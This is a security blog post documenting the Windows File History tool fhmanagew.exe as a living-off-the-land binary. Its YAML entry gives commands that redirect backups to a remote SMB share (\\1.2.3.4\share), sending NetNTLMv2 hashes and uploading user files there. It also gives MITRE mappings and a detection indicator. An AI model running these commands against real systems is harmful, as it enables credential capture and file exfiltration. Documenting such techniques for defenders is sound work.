LOLBin: fhmanagew.exe

File history is a backup solution built into Windows from Windows 8 onwards. Once enabled, previous versions of files in Documents, Music, Pictures, Videos, Desktop and OneDrive folder will automatically be copied onto a backup drive.

The File History Management Tool (fhmanagew.exe) is a Living Off The Land Binary (LOLBin) that can be used by attackers to steal credentials and exfiltrate files. Once File History is enabled, the attacker can use the fhmanagew.exe to migrate the backup location to an attacker controlled share, Windows will automatically attempt to authenticate using the current user's account and upload files at regular intervals.

To enable File history from command line, the following sample source code provided by Microsoft can be used. I have compiled it and the binary can be downloaded here. 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
---
Name: fhmanagew.exe
Description: File History Management Tool
Author: Benjamin Lim
Created: 26 Jan 2021
Commands:
  - Command: fhmanagew.exe -migrate \\1.2.3.4\share
    Description: Migrates the File History backup location to a remote drive.
    Usecase: A SMB connection will be created to the remote location, causing NetNTLMv2 challenge hash to be sent in the process. Prerequisite: File Backup must be set up.
    Category: Credentials
    Privileges: User
    MitreID: T1187
    MitreLink: https://attack.mitre.org/techniques/T1187/
    OperatingSystem: Windows 8, Windows 8.1, Windows 10
  - Command: fhmanagew.exe -backupnow
    Description: Triggers the start of the File History backup process.
    Usecase: After migrating backup location to attacker controlled share, upload files from Documents, Music, Pictures, Videos, Desktop and OneDrive folder to new backup location. 
    Category: Upload
    Privileges: User
    MitreID: T1567.002 
    MitreLink: https://attack.mitre.org/techniques/T1567/002/
    OperatingSystem: Windows 8, Windows 8.1, Windows 10
Full_Path:
  - Path: c:\windows\system32\fhmanagew.exe
Detection: 
  - IOC: SMB traffic from PID 4 to Internet destination 
Resources:
  - Link: https://limbenjamin.com/articles/lolbin-fhmanagew.html
Acknowledgement:
  - Person: Benjamin Lim
    Handle: @limbenjamincom
---

image



Tags: Security

Similar Articles

Rules of Engagement in Cyberspace - Rules of engagement is a concept familiar to most military personnels worldwide. The basic premise of having rules of engagement is to ensure an appropriate level of response or reaction to a ...
Biometrics and Passwords - Many people have the misconception that biometrics such as fingerprint readers are more secure than passwords. It probably stems from Hollywood spy movies showing Top Secret facilities protected ...
The Golden Key - TSA Locks and Encryption - Earlier this year, TSA master keys were leaked and ordinary folks were supposedly able to 3D print these keys and open any luggage with a TSA lock. Despite the huge uproar, I personally feel that ...
Negative space - Sometimes, the lack of information is valuable information. The Washington Post reports that according to unnamed current and former US officials, the CIA pulled "a number of officers" from the ...